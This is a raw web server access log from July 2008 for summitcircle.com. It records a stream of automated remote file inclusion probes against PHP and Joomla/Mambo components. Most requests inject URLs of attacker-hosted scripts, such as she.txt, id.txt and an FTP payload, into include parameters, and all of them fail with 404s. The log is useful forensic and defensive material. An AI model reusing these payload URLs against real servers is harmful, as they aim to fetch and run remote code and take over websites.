118.129.166.13 - - [13/Jul/2008:17:21:32 -0700] "GET /skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
118.129.166.13 - - [13/Jul/2008:17:21:43 -0700] "GET /logs/access_071008.log/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
118.129.166.13 - - [13/Jul/2008:17:21:48 -0700] "GET /logs/access_071008.log/skin/zero_vote/error.php?dir=http://c0d3d.t35.com/she.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:21:50 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:21:51 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:17:22:37 -0700] "GET //nav.php?pagina=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:23:29 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:23:29 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
205.234.163.201 - - [13/Jul/2008:17:24:23 -0700] "GET /logs/access.log/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
205.234.163.201 - - [13/Jul/2008:17:24:23 -0700] "GET /facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
205.234.163.201 - - [13/Jul/2008:17:24:23 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
70.85.102.132 - - [13/Jul/2008:17:25:08 -0700] "GET //nav.php?pagina=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
70.85.102.132 - - [13/Jul/2008:17:25:08 -0700] "GET /logs//nav.php?pagina=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
195.19.6.245 - - [13/Jul/2008:17:25:16 -0700] "GET /logs/access_071112.log/index.php?Language=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:25:36 -0700] "GET /logs/access_070826.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:25:36 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:25:36 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:26:13 -0700] "GET /logs/access_080204.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:26:23 -0700] "GET /logs/access_080406.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.6.18.240 - - [13/Jul/2008:17:26:36 -0700] "GET /logs/access_080526.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:27:20 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:27:20 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:27:26 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
72.36.175.146 - - [13/Jul/2008:17:27:51 -0700] "GET /popup.php?path=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:29:11 -0700] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:29:12 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:29:16 -0700] "GET /logs/access_070820.log/index.php?id=1&lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
75.125.143.162 - - [13/Jul/2008:17:29:16 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:29:16 -0700] "GET /index.php?id=1&lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:29:16 -0700] "GET /logs/index.php?id=1&lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.17.200.206 - - [13/Jul/2008:17:29:20 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
85.17.200.206 - - [13/Jul/2008:17:29:20 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
69.72.172.10 - - [13/Jul/2008:17:29:26 -0700] "GET /logs/access_080406.log//modules/TotalCalendar/about.php?inc_dir=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.172.10 - - [13/Jul/2008:17:29:26 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.172.10 - - [13/Jul/2008:17:29:26 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.172.10 - - [13/Jul/2008:17:29:27 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:30:06 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:30:06 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:30:24 -0700] "GET /logs/access_071210.log/index.php?body=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:30:24 -0700] "GET /index.php?body=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:30:24 -0700] "GET /logs/index.php?body=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:30:29 -0700] "GET /logs/access_071008.log/index.php?body=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.102.100 - - [13/Jul/2008:17:31:02 -0700] "GET /logs/errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.summitcircle.com"
70.85.102.100 - - [13/Jul/2008:17:31:02 -0700] "GET /errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.summitcircle.com"
89.188.110.128 - - [13/Jul/2008:17:31:16 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:31:21 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:31:32 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:31:32 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:31:32 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:31:33 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:32:36 -0700] "GET /logs/access_080310.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:32:36 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:32:37 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:32:52 -0700] "GET /logs/access_080121.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:32:53 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:32:54 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
89.108.67.119 - - [13/Jul/2008:17:33:15 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.188 - - [13/Jul/2008:17:33:42 -0700] "GET /logs/access_080310.log//load_lang.php?_SERWEB[serwebdir]=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.188 - - [13/Jul/2008:17:33:43 -0700] "GET //load_lang.php?_SERWEB[serwebdir]=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.188 - - [13/Jul/2008:17:33:43 -0700] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:17:34:10 -0700] "GET /logs/access.log//nav.php?pagina=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:17:34:11 -0700] "GET /logs//nav.php?pagina=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:34:24 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:34:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
208.69.192.170 - - [13/Jul/2008:17:34:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
87.106.18.76 - - [13/Jul/2008:17:34:39 -0700] "GET /logs/access_071105.log/list.php?table=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.18.76 - - [13/Jul/2008:17:34:44 -0700] "GET /logs/access_071105.log/list.php?table=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.18.76 - - [13/Jul/2008:17:34:49 -0700] "GET /logs/list.php?table=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.18.76 - - [13/Jul/2008:17:34:55 -0700] "GET /logs/list.php?table=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.18.76 - - [13/Jul/2008:17:35:00 -0700] "GET /logs/access_071029.log/list.php?table=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.18.76 - - [13/Jul/2008:17:35:05 -0700] "GET /logs/access_071029.log/list.php?table=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:35:12 -0700] "GET /display.php?pg=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:36:14 -0700] "GET /logs/access_071008.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.17.200.206 - - [13/Jul/2008:17:36:42 -0700] "GET //include/bbs.lib.inc.php?site_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
85.17.200.206 - - [13/Jul/2008:17:36:42 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://gallerycnl.com/bbs/data/member/1159027099/id_jaheem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:37:13 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:37:14 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:37:22 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:37:39 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:37:39 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:17:37:40 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:37:42 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:37:49 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:37:49 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
204.15.10.22 - - [13/Jul/2008:17:37:53 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
204.15.10.22 - - [13/Jul/2008:17:37:53 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
217.151.102.50 - - [13/Jul/2008:17:38:17 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:38:30 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:38:30 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:38:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:38:46 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:38:46 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:38:46 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
202.134.105.107 - - [13/Jul/2008:17:38:54 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
202.134.105.107 - - [13/Jul/2008:17:38:55 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:38:55 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:38:56 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:38:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.227.193.211 - - [13/Jul/2008:17:38:57 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:39:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:39:04 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:39:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.203.228.120 - - [13/Jul/2008:17:39:05 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
213.203.228.120 - - [13/Jul/2008:17:39:05 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:39:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:39:06 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.25.195.68 - - [13/Jul/2008:17:39:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:39:14 -0700] "GET /logs/access_070820.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
83.19.144.26 - - [13/Jul/2008:17:39:25 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.summitcircle.com"
83.19.144.26 - - [13/Jul/2008:17:39:25 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:17:39:36 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
